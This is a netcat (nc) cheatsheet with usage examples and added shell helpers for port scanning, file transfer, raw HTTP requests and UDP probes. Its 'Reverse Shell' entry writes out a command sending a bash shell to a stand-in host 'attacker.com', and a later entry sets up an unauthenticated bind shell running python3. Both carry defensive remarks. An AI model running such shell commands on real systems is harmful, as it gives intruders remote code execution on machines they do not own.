# Cheatsheet & Examples: nc

## Port Scanning  

Example Usage:  
`nc -zv example.com 80 443`  

What it does:  
Scans the listed ports on a target host to determine whether they accept TCP connections. The `-z` option makes nc connect and immediately close without sending any data (zero-I/O mode), and `-v` reports the outcome of each attempt on stderr.  

Command-line Arguments Explained:  
- `-z`: Zero-I/O mode: completes the TCP handshake, then closes the connection without sending data, which is what makes it usable for port scanning.  
- `-v`: Verbose mode: prints one line per port stating whether the connection succeeded or failed.  
- `example.com`: Target hostname or IP address.  
- `80 443`: Port numbers to scan; OpenBSD nc also accepts ranges such as `80-443`.  
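As an added example (not part of the cheatsheet), a small wrapper that sweeps a port range with `nc -z` and tells closed ports (RST received) apart from filtered ones (no answer before `-w` expires); it assumes an OpenBSD-style nc with `-z`, `-v` and `-w`, and the host and ports are made up.

```shell
#!/bin/sh
# Added example: sweep a TCP port range with nc -z and classify each port
# from nc's exit status and the diagnostic it prints on failure.
# Assumes an OpenBSD-style nc (-z, -v, -w); host/ports below are made up.

# classify MESSAGE -> "closed" (RST received) or "filtered" (no answer),
# based on the text nc prints on stderr when a connect fails.
classify() {
  case $1 in
    *"Connection refused"*) echo closed ;;
    *"timed out"*)          echo filtered ;;
    *)                      echo unknown ;;
  esac
}

# scan_range HOST FIRST LAST -> one "HOST PORT STATE" line per port.
scan_range() {
  host=$1; p=$2; last=$3
  while [ "$p" -le "$last" ]; do
    # -z: connect, then close without sending data; -w 2: give up after
    # 2 s so a silently dropped SYN shows up as "filtered" instead of hanging.
    if out=$(nc -z -v -w 2 "$host" "$p" 2>&1); then
      echo "$host $p open"
    else
      echo "$host $p $(classify "$out")"
    fi
    p=$((p + 1))
  done
}

# Usage: scan_range example.com 78 82
```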

---

## Connecting to a Remote Server  

Example Usage:  
`nc example.com 80`  

What it does:  
Establishes a TCP connection to a remote server on the given port; whatever is typed on stdin is sent to the server, and whatever the server sends is printed to stdout. Everything travels in cleartext unless the service itself encrypts it.  

Command-line Arguments Explained:  
- `example.com`: Target hostname or IP address.  
- `80`: Port number to connect to.  

---

## Listening for Incoming Connections  

Example Usage:  
`nc -l 8080`  

What it does:  
Listens for incoming TCP connections on the given port, acting as a simple server. It accepts a single client and exits when that connection closes (see `-k` below for a persistent listener).  

Command-line Arguments Explained:  
- `-l`: Enables listening mode (server).  
- `8080`: Port number to listen on.  

---

## File Transfer Between Machines  

Example Usage:  
Receiver: `nc -l 9999 > received_file.txt`  
Sender: `nc 192.168.1.1 9999 < send_file.txt`  

What it does:  
Transfers a file between two machines by using Netcat as a raw data conduit. Start the receiver first, then the sender; the sender exits once the file has been sent. nc adds no authentication, encryption or integrity check, so confirm the copy with a checksum (e.g., `sha256sum`) on both ends.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode on the receiver.  
- `9999`: Port number for the transfer.  
- `> received_file.txt`: Redirects received data to a file.  
- `< send_file.txt`: Sends the contents of a file to the remote host.  
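As an added example (not part of the cheatsheet), receiver/sender wrappers that verify the copy with SHA-256 afterwards, since nc itself checks nothing; the sender uses `-N` (OpenBSD nc) so the receiver sees end-of-file instead of waiting for a timeout. Host, port and file names are made up.

```shell
#!/bin/sh
# Added example: nc file transfer with a SHA-256 check on both ends.
# Assumes OpenBSD-style nc with -N and -w; host/port/filenames are made up.

# sha256_of FILE -> hex digest (coreutils sha256sum, falling back to shasum)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d ' ' -f 1
  else
    shasum -a 256 "$1" | cut -d ' ' -f 1
  fi
}

# checksum_matches FILE EXPECTED -> exit 0 if the file hashes to EXPECTED
checksum_matches() {
  [ "$(sha256_of "$1")" = "$2" ]
}

# Receiver side: run this first. -l listens on PORT; output goes to OUTFILE,
# and the digest is printed so it can be compared with the sender's.
recv_file() {            # recv_file PORT OUTFILE
  nc -l "$1" > "$2" && echo "received $2 sha256=$(sha256_of "$2")"
}

# Sender side: -N shuts the socket down after stdin hits EOF so the receiver
# sees end-of-file; -w 10 abandons the attempt if the peer never answers.
send_file() {            # send_file HOST PORT INFILE
  echo "sending $3 sha256=$(sha256_of "$3")"
  nc -N -w 10 "$1" "$2" < "$3"
}

# Usage (two machines):  recv_file 9999 received_file.txt
#                        send_file 192.168.1.1 9999 send_file.txt
```

Compare the two printed digests; a mismatch means the transfer was truncated or altered in transit.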

---

## Sending Data to a Server  

Example Usage:  
`printf 'GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n' | nc example.com 80`  

What it does:  
Sends raw data (e.g., an HTTP request) to a server over a TCP connection. An HTTP/1.1 request must carry a `Host:` header and end with a blank line, or the server will wait for more input or reject it; `Connection: close` makes the server hang up so nc exits on its own.  

Command-line Arguments Explained:  
- `example.com`: Target hostname or IP address.  
- `80`: Port number to send data to.  

---

## UDP Communication  

Example Usage:  
`nc -u 192.168.1.1 53`  

What it does:  
Sends UDP datagrams to a remote host (UDP has no handshake, so no connection is actually established), useful for testing DNS or other UDP-based services. Because there is no handshake, nc prints nothing until the service replies or an ICMP port-unreachable message arrives.  

Command-line Arguments Explained:  
- `-u`: Specifies UDP protocol instead of TCP.  
- `192.168.1.1`: Target hostname or IP address.  
- `53`: Port number (e.g., DNS).  

---

## Reverse Shell (Security Use Case)  

Example Usage:  
`nc -e /bin/bash attacker.com 4444`  

What it does:  
Connects out to a remote host (e.g., an attacker's machine) and attaches a shell to the connection, often used for reverse connections in penetration testing. For defenders, an nc process spawning `/bin/bash` with an outbound socket is a high-signal event for process-monitoring and EDR rules, and egress filtering limits where such a connection can go.  

Command-line Arguments Explained:  
- `-e`: Executes the given program (e.g., `/bin/bash`) after connecting, with its stdin/stdout attached to the socket. Present in nc.traditional and ncat; the OpenBSD nc variant does not implement it.  
- `attacker.com`: Target hostname or IP address.  
- `4444`: Port number to connect to.  

---

## Timeouts and Connection Management  

Example Usage:  
`nc -w 5 example.com 22`  

What it does:  
Sets a timeout: connections that cannot be established, or that go idle, are abandoned after the given number of seconds and nc exits with a non-zero status. `-w` has no effect in listen mode (`-l`).  

Command-line Arguments Explained:  
- `-w 5`: 5-second timeout for connecting and for idle connections.  
- `example.com`: Target host.  
- `22`: Port number (e.g., SSH).  

---

## Using Source IP/Port  

Example Usage:  
`nc -s 192.168.1.100 -p 5000 example.com 80`  

What it does:  
Specifies the source IP address and port for the outgoing connection, useful for testing a particular network interface or for exercising firewall rules that key on the source address or port.  

Command-line Arguments Explained:  
- `-s 192.168.1.100`: Sets the source IP address (must belong to a local interface).  
- `-p 5000`: Sets the source port (must be free; ports below 1024 require root).  
- `example.com`: Target host.  
- `80`: Target port.  

---

## Creating a Simple Chat Server  

Example Usage:  
Receiver: `nc -l 1234`  
Sender: `nc 192.168.1.1 1234`  

What it does:  
Establishes a basic two-way text channel between two machines: lines typed on either side appear on the other. Useful for ad-hoc chat or testing; the traffic is unencrypted.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode on the receiver.  
- `1234`: Port number for the chat channel.  
- `192.168.1.1`: Receiver’s IP address (sender’s target).  

---

## Redirecting Output to a File  

Example Usage:  
`nc 192.168.1.1 80 > output.html`  

What it does:  
Saves whatever the remote server sends to a local file. An HTTP server sends nothing until it receives a request, so type (or pipe in) a request first; only the server's reply goes to the file.  

Command-line Arguments Explained:  
- `192.168.1.1`: Target host.  
- `80`: Port number.  
- `> output.html`: Redirects the received data to a file.  

---

## Listening with Keep-Alive (-k)  

Example Usage:  
`nc -l -k 9999`  

What it does:  
Listens for incoming connections and keeps listening after each client disconnects, so the server can be used repeatedly. Clients are still served one at a time, and `-k` requires `-l`.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode.  
- `-k`: Keeps the listener running after a connection ends.  
- `9999`: Port number.  

---

## Testing HTTP Servers  

Example Usage:  
`nc example.com 80`  
Then type `GET / HTTP/1.1`, press Enter, type `Host: example.com`, and press Enter twice (the blank line terminates the request headers).  

What it does:  
Manually interacts with an HTTP server to inspect raw responses or troubleshoot issues; the reply is printed verbatim, headers included.  

Command-line Arguments Explained:  
- `example.com`: Target hostname.  
- `80`: Port for HTTP.  
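As an added example (not part of the cheatsheet), serving both the "Sending Data to a Server" and "Testing HTTP Servers" entries: a helper that builds a well-formed HTTP/1.1 request, pipes it through nc, and extracts the status code from the reply. Host, port and path are made up.

```shell
#!/bin/sh
# Added example: scripted HTTP check through nc.
# Assumes an nc that supports -w; host/port/path below are made up.

# build_request HOST PATH -> the raw request bytes. HTTP/1.1 needs a Host
# header and CRLF line endings; the empty line ends the header block, and
# Connection: close makes the server hang up so nc exits on its own.
build_request() {
  printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$2" "$1"
}

# status_code RESPONSE -> the 3-digit code from the status line
# (e.g. "HTTP/1.1 200 OK" -> 200); the CR is stripped first.
status_code() {
  printf '%s\n' "$1" | head -n 1 | tr -d '\r' | cut -d ' ' -f 2
}

# http_get HOST PORT PATH -> prints the full raw response. -w 5 bounds the
# wait so a server that never answers does not hang the script.
http_get() {
  build_request "$1" "$3" | nc -w 5 "$1" "$2"
}

# Usage: resp=$(http_get example.com 80 /); echo "status: $(status_code "$resp")"
```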

---

## UDP Port Probe  

Example Usage:  
`nc -u -z 192.168.1.1 53`  

What it does:  
Probes a UDP port without sending a payload. This command relays nothing: nc on its own does not forward traffic between hosts. Because UDP has no handshake, `-z` can only infer a closed port from an ICMP port-unreachable reply; silence means the port is either open or filtered, so the result is far less reliable than a TCP scan.  

Command-line Arguments Explained:  
- `-u`: Uses UDP instead of TCP.  
- `-z`: Zero-I/O mode: sends no data, so only ICMP errors reveal anything.  
- `192.168.1.1`: Target host.  
- `53`: Port for DNS or another UDP service.  

---

## Running Commands on Connection  

Example Usage:  
`nc -l -p 8080 -e /usr/bin/python3`  

What it does:  
Starts a listener and, when a client connects, runs `/usr/bin/python3` with its stdin and stdout attached to the socket, handing the connecting client an interactive interpreter. This is effectively a bind shell: anyone who can reach the port gets unauthenticated code execution as the user running nc, so it belongs only on isolated test networks. The `-l -p` form is nc.traditional/ncat syntax; OpenBSD nc takes the port positionally (`nc -l 8080`) and has no `-e`.  

Command-line Arguments Explained:  
- `-l`: Enables listening mode.  
- `-p 8080`: Port to listen on (nc.traditional/ncat form).  
- `-e /usr/bin/python3`: Runs the given program on connection with the socket as its stdin/stdout.  
